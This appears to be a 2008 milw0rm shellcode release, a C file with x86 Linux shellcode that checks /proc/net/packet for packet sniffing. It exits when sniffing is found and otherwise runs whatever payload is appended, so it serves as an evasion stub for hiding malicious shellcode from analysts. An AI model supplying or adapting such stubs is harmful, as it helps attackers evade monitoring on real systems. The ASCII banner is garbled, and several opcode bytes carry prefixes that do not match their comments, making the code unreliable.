/*
-愨-,,鈄(TM) -,, -,,-,,-,, . - -,, 鈄(TM) -OE -,, 路. -,,鈄(TM) -,,-OE -,,-,,-,,-,,-,, -,,-,,-,,路
-^-OE-^-OE- -EUR-,,.-EUR路 鈄(TM)-^-OE-愨-^ - 路-^-^ -愨-^-^-^- -^- -^-^-OE 鈄(TM)-^-^ -愨-^ -EUR-^
路-^-^路 -愨-EUR-EUR- -,, -愨-^-愨-愨-OE -,,-^-EUR-,, -愨-^ -OE-愨-OE-愨-^路 -^-OE-愨-^-OE -愨-^.- -,,-^-EUR-EUR-^
- -愨-^路-^-OE -愨-^-,,-,,-OE -^-^-愨-^-OE -愨-^-OE.-愨-OE -^-^ -^-^-OE-愨-^-OE -愨-^-,,-^-OE -愨-^-OE路 -愨-^ - -愨-OE
鈄(TM)-EUR-EUR -EUR-EUR -EUR-EUR-EUR -EUR-EUR -^- -EUR-^-,,-EUR- -EUR-EUR -^- -EUR-EUR-EUR -EUR-EUR-EUR -EUR-EUR-EUR -EUR -EUR
Ho' Detector (Promiscuous mode detector shellcode)
by XenoMuta <xenomuta[at]phreaker[dot]net>
http://xenomuta.tuxfamily.org/
This shellcode uses a stupid, yet effective method
for detecting sniffing on all interfaces in linux:
parsing /proc/net/packet, which contains libpcap's
stats and only one line (56 bytes) when not sniffing.
*/
char sc[]=
"\x66\x31\xC0" // xor eax,eax
"\x66\x50" // push eax
"\x66\x68\x63\x6B\x65\x74" // push dword 0x74656b63 ; cket
"\x66\x68\x74\x2F\x70\x61" // push dword 0x61702f74 ; t/pa
"\x66\x68\x63\x2F\x6E\x65" // push dword 0x656e2f63 ; c/ne
"\x66\x68\x2F\x70\x72\x6F" // push dword 0x6f72702f ; /pro
"\xB0\x05" // mov al,0x5 ; open()
"\x66\x89\xE3" // mov ebx,esp ; /proc/net/packet
"\x66\x31\xC9" // xor ecx,ecx ; O_RDONLY
"\xCD\x80" // int 0x80
"\x66\x93" // xchg eax,ebx
"\x6A\x03" // push byte +0x3 ; read()
"\x66\x58" // pop eax
"\x66\x89\xE1" // mov ecx,esp
"\x6A\x39" // push byte +0x39 ; at most 57 bytes
"\x66\x5A" // pop edx
"\xCD\x80" // int 0x80
"\x3C\x38" // cmp al,0x38 ; if only 56 bytes
"\x74\x06" // jz 0x40 ; there is no packet
"\x6A\x01" // push byte +0x1 ; capture. Proceed
"\x66\x58" // pop eax ; with shellcode
"\xCD\x80" // int 0x80 ; else, exit()
/*
Append your shellcode here
*/
"\x90";
main(){(*(void (*)()) sc)();}
-----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAkkjGO0ACgkQ2LnNaOYR/B1h1QCg2uatkfAzSE5Jgc3bzJmFU/3s
opMAoLufSxvFoSNl3W+6h5rxmLIcq2Mp
=ISTU
-----END PGP SIGNATURE-----
// milw0rm.com [2008-11-18]
